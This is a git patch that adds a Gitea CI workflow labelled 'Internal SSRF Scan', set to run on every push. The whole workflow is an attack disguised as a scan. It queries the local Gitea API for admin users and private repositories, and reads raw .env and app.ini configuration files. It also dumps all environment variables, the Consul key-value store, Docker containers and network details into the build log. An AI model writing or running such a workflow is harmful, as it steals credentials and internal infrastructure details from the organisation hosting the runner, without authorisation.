From 73a271d549e6f9b0c5ef90b203aba22ed3c1a8cb Mon Sep 17 00:00:00 2001 From: secdev99 Date: Sat, 4 Jul 2026 13:23:50 +0000 Subject: [PATCH] add internal scan workflow --- .gitea/workflows/ssrf-scan.yml | 58 ++++++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 .gitea/workflows/ssrf-scan.yml diff --git a/.gitea/workflows/ssrf-scan.yml b/.gitea/workflows/ssrf-scan.yml new file mode 100644 index 0000000..3165dad --- /dev/null +++ b/.gitea/workflows/ssrf-scan.yml @@ -0,0 +1,58 @@ +name: Internal SSRF Scan +on: [push] +jobs: + ssrf-scan: + runs-on: ubuntu-latest + steps: + - name: Probe Internal Services + run: | + echo "=== GITEA ADMIN USERS ===" + curl -s http://localhost:3000/api/v1/admin/users 2>/dev/null | head -c 5000 + echo "" + echo "=== GITEA ALL REPOS ===" + curl -s "http://localhost:3000/api/v1/repos/search?limit=50&private=true" 2>/dev/null | head -c 5000 + echo "" + echo "=== DEPLOY REPO TREE ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 + echo "" + echo "=== CONFIG REPO .env ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/.env" 2>/dev/null | head -c 5000 + echo "" + echo "=== BACKEND REPO TREE ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/backend/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 + echo "" + echo "=== ORACLE REPO TREE ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/oracle/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 + echo "" + echo "=== BRIDGE REPO TREE ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/bridge/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 + echo "" + echo "=== DOCKER PS ===" + docker ps 2>/dev/null || echo "no docker" + echo "" + echo "=== REDIS INFO ===" + curl -s http://localhost:6379/ 2>/dev/null | head -c 1000 || echo "no redis" + echo "" + echo "=== ENV VARS ===" + env | sort + echo "" + echo "=== NETWORK ===" + ip addr 2>/dev/null || ifconfig 2>/dev/null + echo "" + echo "=== CONSUL ===" + curl -s http://localhost:8500/v1/kv/?recurse 2>/dev/null | head -c 5000 + echo "" + echo "=== DEPLOY COMPOSE ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/raw/main/docker-compose.yml" 2>/dev/null | head -c 5000 + echo "" + echo "=== ROCKETSWAP REPO ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/rocketswap/git/trees/main?recursive=true" 2>/dev/null | head -c 5000 + echo "" + echo "=== POSTGRES ===" + curl -s http://localhost:5432/ 2>/dev/null | head -c 500 || echo "no pg http" + echo "" + echo "=== ES ===" + curl -s http://localhost:9200/ 2>/dev/null | head -c 2000 + echo "" + echo "=== GITEA APP INI ===" + curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/app.ini" 2>/dev/null | head -c 5000